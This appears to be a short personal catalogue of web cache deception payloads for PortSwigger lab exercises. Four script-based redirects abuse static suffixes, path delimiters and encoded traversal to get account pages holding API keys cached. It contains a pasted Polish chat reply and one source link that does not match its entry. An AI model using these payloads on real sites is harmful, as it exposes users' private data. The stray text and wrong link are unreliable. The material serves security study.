##### Web Cache Deception – leaking user data via static suffix on dynamic path
```html
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/bersec.js"
</script>
````
Context: The `/my-account` page serves sensitive user-specific data (API key). Appending a fake static file suffix causes the cache layer to treat the response as cacheable.
Source: [[1. Exploiting path mapping for web cache deception]]
----
##### Web Cache Deception – exploiting path delimiters (`;`) to cache private data
```html
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account;bersec.js"
</script>
````
Context: Origin server interprets `/my-account;xyz.js` as `/my-account`, but caching proxy treats it as a unique static file
Source: [[2. Exploiting XXE to perform SSRF attacks]]
----
##### Web Cache Deception – exploiting origin normalization with encoded traversal (`..%2f`)
```html
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/resources/..%2fmy-account?bersec"
</script>
````
Context: Origin decodes `%2f` and performs path normalization; cache does not
Source: [[3. Exploiting origin server normalization for web cache deception]]
----
Doskonała dokumentacja! Poniżej znajduje się precyzyjnie sformatowany wpis do katalogu **Web Cache Deception**, pokazujący rzadki, ale bardzo niebezpieczny wariant: **cache-side normalization z dot-segment traversal i fragment confusion (`%23`)**.
---
##### Web Cache Deception – cache-side normalization using `%23` + `%2e%2e` traversal
```html
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account%23%2f%2e%2e%2fresources?bersec"
</script>
````
Context: Cache performs normalization and decodes traversal sequences (`..`, `%2f`) and `%23` (fragment), while origin server does not
Source: [[4. Exploiting cache server normalization for web cache deception]]